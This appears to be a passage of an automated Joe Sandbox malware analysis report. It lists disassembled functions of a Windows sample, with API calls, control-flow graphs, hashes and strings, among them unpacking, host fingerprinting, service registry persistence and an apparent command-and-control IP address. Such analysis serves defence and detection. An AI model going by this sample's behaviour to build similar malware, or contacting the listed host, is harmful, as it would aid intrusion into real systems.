                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProcmemset$Library$FreeLoadOpenwsprintf
                                                                    • String ID: %$C$C$E$M$Rsjshd fzfgkqcm$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$lSet\Services\%s$lSet\Services\%s$n$n$o$o$r$r$r$r$s$s$t$t$t$u$v
                                                                    • API String ID: 810712220-1893777433
                                                                    • Opcode ID: 0a44ea020a374581c80b03d6e5ade6fb3444afdf4d7155b5b984ecda8689c0a9
                                                                    • Instruction ID: 82b46aae5da0cc8703e41464dda74b7941b1ede7af1ffc32b8e9f74a15831d0f
                                                                    • Opcode Fuzzy Hash: 0a44ea020a374581c80b03d6e5ade6fb3444afdf4d7155b5b984ecda8689c0a9
                                                                    • Instruction Fuzzy Hash: D741CD50D0C6C9EDEF02C6A8C8497DFBFB55B26349F084098D6843A292C6FE575887B6
                                                                    Function 00401360 Relevance: 52.7, APIs: 2, Strings: 33, Instructions: 219COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 75 401360-4014a8 call 401000 * 3 82 4014b4-4014c1 75->82 83 4014aa-4014b3 75->83 84 4014c3-4014cc 82->84 85 4014cd-4014e2 VirtualAlloc 82->85 86 401500-401578 VirtualAlloc call 4015e0 85->86 87 4014e4-4014f6 85->87 95 401584-40158f call 401990 86->95 96 40157a-401581 call 401910 86->96 87->86 90 4014f8-4014ff 87->90 101 401591-4015a2 call 401750 95->101 102 4015b5-4015c7 call 401c70 95->102 96->95 107 4015a4-4015a8 101->107 108 4015cf-4015d8 101->108 107->102 109 4015aa-4015af call 10009fbf 107->109 110 4015b1-4015b3 109->110 110->102 111 4015c8 110->111 111->108
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .$2$3$A$A$G$H$H$K$L$N$P$R$a$a$a$c$c$c$d$e$e$e$e$i$o$o$o$p$p$r$r$t
                                                                    • API String ID: 0-3752444969
                                                                    • Opcode ID: 2933b1640a77473e5a9bf63a7154480bbc0cbebac266aa1ac65446c5f0ad019f
                                                                    • Instruction ID: 00d2931fe6e782e78b6ecc90307b645ea51b53a64ad84e64509d03b0b15326ed
                                                                    • Opcode Fuzzy Hash: 2933b1640a77473e5a9bf63a7154480bbc0cbebac266aa1ac65446c5f0ad019f
                                                                    • Instruction Fuzzy Hash: 1481917120C3C0AEE351DB688844B5BBFD56B92348F48086DF6C49B392D2FAD518C767
                                                                    Function 10007BF6 Relevance: 51.0, APIs: 20, Strings: 9, Instructions: 219registrystringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.MSVCRT ref: 10007C11
                                                                    • lstrcpyA.KERNEL32(?,Rsjshd fzfgkqcm,?,1001211C,?), ref: 10007C32
                                                                      • Part of subcall function 10007289: lstrlenA.KERNEL32(?,?,?,759183C0,00000100), ref: 100072E2
                                                                      • Part of subcall function 10007289: lstrcpyA.KERNEL32(?,Default,?,?,759183C0,00000100), ref: 100072EE
                                                                      • Part of subcall function 10007289: lstrlenA.KERNEL32(?,?,?,759183C0,00000100), ref: 100072F5
                                                                    • lstrcpyA.KERNEL32(?,Default), ref: 10007C67
                                                                    • memset.MSVCRT ref: 10007C86
                                                                    • getsockname.WS2_32(?,?,?), ref: 10007C9F
                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 10007CB4
                                                                    • memcpy.MSVCRT(?,?,00000032,?,?,00000004), ref: 10007CC9
                                                                    • GetVersionExA.KERNEL32(?), ref: 10007CE2
                                                                    • RegOpenKeyA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,?), ref: 10007D19
                                                                    • RegQueryValueExA.KERNEL32(?,~MHz,00000000,?,?,?), ref: 10007D34
                                                                    • RegCloseKey.ADVAPI32(?), ref: 10007D3D
                                                                    • wsprintfA.USER32 ref: 10007D85
                                                                    • wsprintfA.USER32 ref: 10007D9A
                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 10007DAF
                                                                    • GetDriveTypeA.KERNEL32(?), ref: 10007DEA
                                                                    • GetDiskFreeSpaceExA.KERNEL32(?,?,?,?), ref: 10007E05
                                                                    • memset.MSVCRT ref: 10007E56
                                                                    • GetLastInputInfo.USER32(?), ref: 10007E7C
                                                                    • GetTickCount.KERNEL32 ref: 10007E82
                                                                    • lstrcpyA.KERNEL32(?,10012F70), ref: 10007EC0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcpy$memset$lstrlenmemcpywsprintf$CloseCountDiskDriveFreeGlobalInfoInputLastMemoryOpenQuerySpaceStatusTickTypeValueVersiongetsockname
                                                                    • String ID: :$@$Default$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Rsjshd fzfgkqcm$V10.0 Pro$V5.0$\$~MHz
                                                                    • API String ID: 2919733465-4239207477
                                                                    • Opcode ID: d142667f6f4ca06a1dd7499e4939cd3fb2fcda4c2aae144bfe61f7145d162441
                                                                    • Instruction ID: e36f9bee0898f0eecf57ec343b3184e1500d21f13cb96f03395a289332e7a165
                                                                    • Opcode Fuzzy Hash: d142667f6f4ca06a1dd7499e4939cd3fb2fcda4c2aae144bfe61f7145d162441
                                                                    • Instruction Fuzzy Hash: EF81FDB6C0122CABEB11DBA4DC89ECEB7BCEF09351F4045A6E508E3145D774AA84CF60
                                                                    Function 00401990 Relevance: 47.4, APIs: 1, Strings: 26, Instructions: 167libraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 148 401990-401a9f call 401000 * 2 153 401aa5-401ab4 148->153 154 401b7e-401b87 148->154 156 401b88-401b94 153->156 157 401aba-401abf 153->157 157->156 158 401ac5-401ad1 LoadLibraryA 157->158 159 401b74-401b7d 158->159 160 401ad7-401af3 call 4010f0 158->160 160->159 163 401af5-401b06 160->163 164 401b12-401b18 163->164 165 401b08-401b10 163->165 166 401b1a-401b1e 164->166 165->166 167 401b20-401b25 166->167 168 401b51-401b65 166->168 169 401b27-401b2c 167->169 170 401b2e 167->170 168->156 174 401b67-401b6f 168->174 171 401b32-401b42 call 401000 169->171 170->171 171->159 176 401b44-401b4f 171->176 174->157 176->167 176->168
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040158A,00000000), ref: 00401AC8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID: .$2$3$A$B$I$K$L$L$L$N$P$b$d$d$d$d$e$i$o$r$r$r$s$t$y
                                                                    • API String ID: 1029625771-3388813359
                                                                    • Opcode ID: b1d882614961501901be177fc1f0da46e529f11cc82f20473a645d28c02f45c7
                                                                    • Instruction ID: 47ca0c19adcb0b32267935f5d69aec93d3a63e6231f51b2bfe92e8f32b603451
                                                                    • Opcode Fuzzy Hash: b1d882614961501901be177fc1f0da46e529f11cc82f20473a645d28c02f45c7
                                                                    • Instruction Fuzzy Hash: F8616F7150C3C19ED311CA68844475BFFE4AB92358F48496EF5C49B392D3BAE908C7A7
                                                                    Function 00401750 Relevance: 45.1, APIs: 1, Strings: 29, Instructions: 129COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 177 401750-40185e call 401000 * 2 182 401864-401866 177->182 183 4018fb-401900 177->183 184 401869-401886 182->184 185 401888-401899 VirtualFree 184->185 186 40189b-4018ad 184->186 187 4018e1-4018f3 185->187 188 4018b5-4018bc 186->188 189 4018af 186->189 187->184 190 4018f9-4018fa 187->190 191 4018d0 188->191 192 4018be-4018c0 188->192 189->188 190->183 191->187 193 4018d2-4018dc 191->193 194 4018c2-4018c5 192->194 195 4018c7-4018c9 192->195 193->187 196 4018ce 194->196 195->187 197 4018cb 195->197 196->191 197->196
                                                                    APIs
                                                                    • VirtualFree.KERNELBASE(?,?,00004000,00000000,00000000,?,00000000,?,?,?,00000000), ref: 00401895
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeVirtual
                                                                    • String ID: .$2$3$F$KruV$L$P$V$V$a$a$c$d$e$e$e$i$i$l$l$l$l$o$r$r$r$r$u$u
                                                                    • API String ID: 1263568516-1588098630
                                                                    • Opcode ID: 1883f15f55cf7816e9bd0d9555f496c7e6a5d35e9ab2fc1f90b1f8d7aa62afe9
                                                                    • Instruction ID: b5451970975fc47b5202467ba196f3e9ecf33508c144bba1827580a19011a843
                                                                    • Opcode Fuzzy Hash: 1883f15f55cf7816e9bd0d9555f496c7e6a5d35e9ab2fc1f90b1f8d7aa62afe9
                                                                    • Instruction Fuzzy Hash: 06515D2150C3C08EE311DA68C444B5BBFE56BA6708F48499DF5C56B392D2BAD608C77B
                                                                    Function 10008BDA Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205stringsynchronizationsleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 10008BDF
                                                                    • wsprintfA.USER32 ref: 10008C10
                                                                    • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 10008C24
                                                                    • GetLastError.KERNEL32 ref: 10008C30
                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 10008C3E
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10008C45
                                                                    • exit.MSVCRT ref: 10008C4C
                                                                      • Part of subcall function 10001E14: setsockopt.WS2_32(?,0000FFFF,00000080,10008E5C,00000004), ref: 10001E39
                                                                      • Part of subcall function 10001E14: CancelIo.KERNEL32(?), ref: 10001E42
                                                                      • Part of subcall function 10001E14: InterlockedExchange.KERNEL32(?,00000000), ref: 10001E4E
                                                                      • Part of subcall function 10001E14: closesocket.WS2_32(?), ref: 10001E57
                                                                      • Part of subcall function 10001E14: SetEvent.KERNEL32(?), ref: 10001E60
                                                                      • Part of subcall function 10005CC4: TerminateThread.KERNEL32(?,000000FF,00000000,1001211C,?,10008E75), ref: 10005CE0
                                                                      • Part of subcall function 10005CC4: CloseHandle.KERNEL32(?), ref: 10005CE8
                                                                    • strstr.MSVCRT ref: 10008D01
                                                                    • strcspn.MSVCRT ref: 10008D15
                                                                    • strncpy.MSVCRT ref: 10008D20
                                                                    • strcspn.MSVCRT ref: 10008D28
                                                                    • strcpy.MSVCRT(00000000,?), ref: 10008D36
                                                                    • lstrcatA.KERNEL32(?,?), ref: 10008D4C
                                                                    • atoi.MSVCRT(?), ref: 10008D59
                                                                    • lstrcatA.KERNEL32(00000000,110.40.45.163), ref: 10008D7B
                                                                    • strcmp.MSVCRT ref: 10008D8D
                                                                    • GetTickCount.KERNEL32 ref: 10008D9C
                                                                    • GetTickCount.KERNEL32 ref: 10008DBF
                                                                    • WaitForSingleObject.KERNEL32(00000064,00000064), ref: 10008E2E
                                                                    • Sleep.KERNEL32(000001F4), ref: 10008E3B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseCountHandleMutexTicklstrcatstrcspn$CancelCreateErrorEventExchangeH_prologInterlockedLastObjectReleaseSingleSleepTerminateThreadWaitatoiclosesocketexitsetsockoptstrcmpstrcpystrncpystrstrwsprintf
                                                                    • String ID: %s:%d:%s$110.40.45.163$Rsjshd fzfgkqcm
                                                                    • API String ID: 1136866262-620539602
                                                                    • Opcode ID: e0b2d7cbaaf13b20cfa8b38897b83dee1724257a1626ba9cdb7bc931ceb6b2c5
                                                                    • Instruction ID: 9d3eb38b871e3855c9d74b804b4ce34c74b1fcffa4d5c0801ef7d38f2f3625d6
                                                                    • Opcode Fuzzy Hash: e0b2d7cbaaf13b20cfa8b38897b83dee1724257a1626ba9cdb7bc931ceb6b2c5
                                                                    • Instruction Fuzzy Hash: 3171427280426DABFF14DBB0CC88EEE77B8FB05384F54016AE505E6196DB319B49CB61
                                                                    Function 1000A5CC Relevance: 38.7, APIs: 14, Strings: 8, Instructions: 183libraryloaderregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 266 1000a5cc-1000a6a4 memset * 3 LoadLibraryA GetProcAddress * 5 RegOpenKeyExA 267 1000a6a6-1000a6aa 266->267 268 1000a6af-1000a6b2 266->268 269 1000a7f5-1000a804 call 1000a826 267->269 268->269 270 1000a6b8-1000a6bd 268->270 277 1000a812-1000a823 269->277 278 1000a806-1000a80c FreeLibrary 269->278 270->269 272 1000a6c3-1000a6c6 270->272 274 1000a7bb-1000a7dc RegQueryValueExA 272->274 275 1000a6cc-1000a6cf 272->275 274->269 276 1000a7de 274->276 279 1000a783-1000a7a3 275->279 280 1000a6d5-1000a6da 275->280 281 1000a7e4-1000a7e8 lstrcpyA 276->281 278->277 279->269 288 1000a7a5-1000a7a8 279->288 282 1000a753-1000a774 280->282 283 1000a6dc-1000a6df 280->283 284 1000a7ee 281->284 282->269 290 1000a776-1000a781 282->290 283->269 285 1000a6e5-1000a706 283->285 284->269 285->269 292 1000a70c 285->292 289 1000a7ad-1000a7b9 wsprintfA 288->289 289->284 290->289 293 1000a712-1000a717 292->293 294 1000a748-1000a74e 293->294 295 1000a719-1000a746 call 1000a571 * 2 call 1000a5aa 293->295 294->281 295->293
                                                                    APIs
                                                                    • memset.MSVCRT ref: 1000A601
                                                                    • memset.MSVCRT ref: 1000A614
                                                                    • memset.MSVCRT ref: 1000A622
                                                                    • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A62F
                                                                    • GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000A647
                                                                    • GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 1000A657
                                                                    • GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 1000A667
                                                                    • GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 1000A674
                                                                    • GetProcAddress.KERNEL32(?,RegCloseKey), ref: 1000A681
                                                                    • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A69F
                                                                    • lstrcpyA.KERNEL32(00000072,?,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A7E8
                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A80C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$memset$Library$FreeLoadOpenlstrcpy
                                                                    • String ID: %08X$ADVAPI32.dll$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA$lSet\Services\%s
                                                                    • API String ID: 590445264-3792285081
                                                                    • Opcode ID: 4aef71da75aae053e3a71f9852c13206c6bebe33a8676f181667619ad66de447
                                                                    • Instruction ID: 6c1da8319406df289ef782658310202be30d02e36ad75691224a4dafe45f4e72
                                                                    • Opcode Fuzzy Hash: 4aef71da75aae053e3a71f9852c13206c6bebe33a8676f181667619ad66de447
                                                                    • Instruction Fuzzy Hash: 1961B9B180415DAFEF21DFA0CC84EDE7BB9FB09380F1042A6F619A2154E7359E959F60
                                                                    Function 1000A87A Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 144libraryloaderregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 302 1000a87a-1000a902 LoadLibraryA GetProcAddress * 6 303 1000a960-1000a97c RegCreateKeyExA 302->303 304 1000a904-1000a905 302->304 305 1000a9db-1000a9e6 call 1000aa06 303->305 306 1000a97e-1000a993 RegOpenKeyExA 303->306 304->306 307 1000a907-1000a908 304->307 318 1000a9e8-1000a9e9 FreeLibrary 305->318 319 1000a9ef-1000aa00 305->319 306->305 311 1000a995-1000a99a 306->311 308 1000a93a-1000a94f 307->308 309 1000a90a-1000a90b 307->309 308->305 324 1000a955-1000a95e 308->324 309->305 313 1000a911-1000a926 309->313 311->305 312 1000a99c-1000a99f 311->312 315 1000a9a1-1000a9a4 312->315 316 1000a9b7-1000a9c5 lstrlenA 312->316 313->305 326 1000a92c-1000a935 313->326 320 1000a9a6-1000a9a9 315->320 321 1000a9ad-1000a9b5 315->321 323 1000a9c6-1000a9cd RegSetValueExA 316->323 318->319 320->316 325 1000a9ab 320->325 321->323 327 1000a9d0-1000a9d2 323->327 324->327 325->305 326->327 327->305 328 1000a9d4 327->328 328->305
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,75A78400,00000000,?,1000AF24,1000D480,000000FF,\Services\%s,10005404,80000002,?,00000072,00000001,00000065,00000000), ref: 1000A8A7
                                                                    • GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 1000A8BE
                                                                    • GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 1000A8C9
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 1000A8D4
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 1000A8DF
                                                                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 1000A8EA
                                                                    • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 1000A8F5
                                                                    • RegCreateKeyExA.KERNEL32(?,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 1000A977
                                                                    • RegOpenKeyExA.KERNEL32(0002001F,00000000,00000000,0002001F,?), ref: 1000A98E
                                                                    • RegSetValueExA.KERNEL32(?,00000000,00000000,?,?,00000001), ref: 1000A9CD
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1000A9E9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$CreateFreeLoadOpenValue
                                                                    • String ID: ADVAPI32.dll$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA$\Services\%s
                                                                    • API String ID: 554063521-3036171793
                                                                    • Opcode ID: c4a2985d78c2249bdba3fc027b41f981ced2e4ddd7b1e8fab8dbb935d79d5b04
                                                                    • Instruction ID: 1eb5c6dd000804f32785a3cffe8c18c6a7d0230b1f2800ff6d6850f5a7545d85
                                                                    • Opcode Fuzzy Hash: c4a2985d78c2249bdba3fc027b41f981ced2e4ddd7b1e8fab8dbb935d79d5b04
                                                                    • Instruction Fuzzy Hash: 9D410F71A0011DBFEF11DF95DC84EEE7BB8EF096D4F024226FA11A6164D7319C919B60
                                                                    Function 10006FE0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 331 10006fe0-10007052 LoadLibraryA GetProcAddress * 3 LoadLibraryA GetProcAddress CoInitialize 333 10007054-10007063 331->333 334 1000706b-1000706d 331->334 336 10007067-10007069 333->336 335 10007100-10007104 334->335 336->334 337 10007072-10007076 336->337 338 1000707b-10007090 337->338 340 10007092-100070a8 338->340 341 100070e3-100070ee 338->341 346 100070d8-100070e1 340->346 347 100070aa-100070c5 340->347 344 100070f0-100070f1 FreeLibrary 341->344 345 100070f3-100070f6 341->345 344->345 348 100070f8-100070fb FreeLibrary 345->348 349 100070fd 345->349 346->338 352 100070c7-100070ca 347->352 353 100070cf-100070d3 347->353 348->349 349->335 352->353 353->346
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(Ole32.dll,759183C0,00000000,00000001), ref: 10006FF4
                                                                    • GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 10007004
                                                                    • GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 1000700F
                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 1000701A
                                                                    • LoadLibraryA.KERNEL32(Oleaut32.dll,?,?,?,?,?,?,?,?,?,?,?,?,10007E35), ref: 10007024
                                                                    • GetProcAddress.KERNEL32(00000000,SysFreeString), ref: 1000702F
                                                                    • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,10007E35), ref: 10007036
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,10007E35), ref: 100070F1
                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10007E35), ref: 100070FB
                                                                    Strings
                                                                    Memory Dump Source
